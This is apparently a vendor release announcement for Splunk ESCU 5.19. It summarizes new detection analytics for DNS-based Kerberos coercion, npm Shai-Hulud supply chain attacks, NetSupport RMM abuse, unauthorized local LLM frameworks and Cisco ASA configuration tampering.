ESCU 5.19 delivers major advancements in detecting supply chain attacks, identity coercion techniques, unauthorized AI usage, and network infrastructure compromise, areas where many organizations continue to face blind spots. This release introduces full analytic coverage for the npm Shai-Hulud ecosystem compromises, giving defenders early visibility into malicious package lifecycle hooks, GitHub workflow tampering, and cross-platform exfiltration behaviors that often unfold silently inside CI/CD pipelines. We also add comprehensive detections for the newly disclosed Kerberos Coercion with DNS (CVE-2025-33073) technique, enabling SOCs to identify DNS-triggered authentication coercion that can lead to credential relay or privilege escalation inside Active Directory environments. New analytics for NetSupport RMM tool abuse help teams distinguish legitimate remote administration from covert access, uncovering renamed binaries, registry manipulation, and stealthy persistence chains.

This release also expands visibility into Shadow AI by detecting unauthorized deployment of local LLM frameworks (Ollama, GPT4All, LM Studio, llama.cpp, and others), providing defenders with early warning before unmonitored AI runtimes become channels for data exposure or endpoint abuse.

Finally, ESCU 5.19 represents the next step in the Splunk + Cisco Better Together story, introducing the most extensive set of Cisco ASA security analytics we have released to date. These detections provide deep visibility into configuration tampering, suppressed logging, packet capture activation, identity misuse, and administrative command reconnaissance (behaviors that often precede firewall takeover, data exfiltration, and boundary manipulation). By bringing ASA telemetry into the same analytic ecosystem as NVM, FTD, Duo, Umbrella, and Talos-driven rapid responses, Splunk now offers customers a more unified and high-fidelity view of adversary behavior across the network control plane.

Together, these updates help customers detect high-impact threats earlier, correlate activity across identity, CI/CD, endpoint, LLM, and network layers, and strengthen their ability to respond quickly to emerging tradecraft across modern enterprise environments.

Following is a summary of the latest updates:

• Kerberos Coercion with DNS (CVE-2025-33073):: Introduced a new analytic story — Kerberos Coercion with DNS — along with detections addressing the recently disclosed CVE-2025-33073 vulnerability. These analytics identify coercion attempts where attackers leverage DNS records to trigger Kerberos authentication from remote hosts, a technique that can lead to credential relay or domain privilege escalation. New detections — Windows Short-Lived DNS Record, Windows Kerberos Coercion via DNS, Windows Credential Target Information Structure in Command Line, and DNS Kerberos Coercion — provide end-to-end visibility into DNS-based coercion behaviors across authentication and name resolution events.
• NPM Supply Chain Compromise (Shai-Hulud Campaigns):Expanded detection coverage for npm ecosystem supply chain compromises, addressing both the Shai-Hulud 2.0 worm campaign and recurring lifecycle hook abuse patterns. This update adds analytics to detect malicious npm package installations that execute arbitrary scripts through preinstall, install, postinstall, or prepare hooks — a long-standing risk vector exploited in major incidents from event-stream (2018) to ua-parser-js (2021) and Shai-Hulud (2025). New detections — Shai-Hulud Workflow File Modification, Shai-Hulud 2.0 Exfiltration Artifacts, and Suspicious GitHub Workflow Creation — monitor file creation, credential theft, and GitHub workflow tampering behaviors, enhancing visibility into cross-platform supply chain compromise and credential exfiltration in CI/CD environments.
• NetSupport RMM Tool Abuse: Strengthened detection coverage for malicious use of the NetSupport Manager RMM tool, which adversaries frequently deploy for covert remote access under the guise of legitimate remote-support activity. New analytics identify NetSupport’s presence through loaded module patterns, executable masquerading, and registry manipulation, including detections for Windows Deletion of Most Recent Used Command via Registry, Executable Masquerading as Benign File Types, and NetSupport RMM Loaded Modules. These complement updated credential-theft coverage in Windows Credentials From Password Stores (Creation/Deletion) to surface cases where NetSupport is deployed as part of a broader credential access or persistence chain. Together, these analytics help distinguish authorized IT administration from unauthorized NetSupport-based intrusions involving renamed binaries, PowerShell-assisted deployment, suspicious startup locations, and stealthy remote control sessions.
• Suspicious Local LLM Frameworks:Added new analytics to address the rise of Shadow AI — unauthorized deployment of local Large Language Model (LLM) frameworks such as Ollama, LM Studio, GPT4All, Jan, llama.cpp, and KoboldCPP inside enterprise environments. These tools allow users to run powerful models locally, creating blind spots for data exfiltration, policy violations, and unmonitored processing of sensitive information. New detections — LLM Model File Creation, Local LLM Framework DNS Query, and Windows Local LLM Framework Execution — monitor model file downloads (.gguf, .ggml, safetensors), suspicious process execution, and DNS lookups to model repositories. By correlating Windows Security logs and Sysmon telemetry, this coverage helps security teams uncover unauthorized AI usage, assess data exposure risks, and enforce AI governance before Shadow AI frameworks evolve into channels for covert data handling or persistent endpoint abuse.
• Suspicious Cisco ASA Activity:Expanded detection coverage for malicious or unauthorized activity on Cisco Adaptive Security Appliances (ASA), focusing on configuration tampering, credential misuse, and covert administrative behaviors often seen in targeted network compromise and firewall takeover scenarios. New analytics surface high-risk events including AAA policy modification, logging filter tampering, logging message suppression, packet capture activation, and device file copy operations—both locally and to remote destinations. Additional detections highlight identity-based abuse such as new local user account creation, user deletion, privilege level changes, and lockout threshold anomalies, along with reconnaissance command usage that may reveal adversary staging or pre-attack mapping. Together, these detections enhance visibility into attempts to weaken audit controls, establish persistence, exfiltrate configuration data, or manipulate security boundaries on Cisco ASA devices

These additions strengthen security teams' ability to detect and respond to emerging threats across critical enterprise platforms.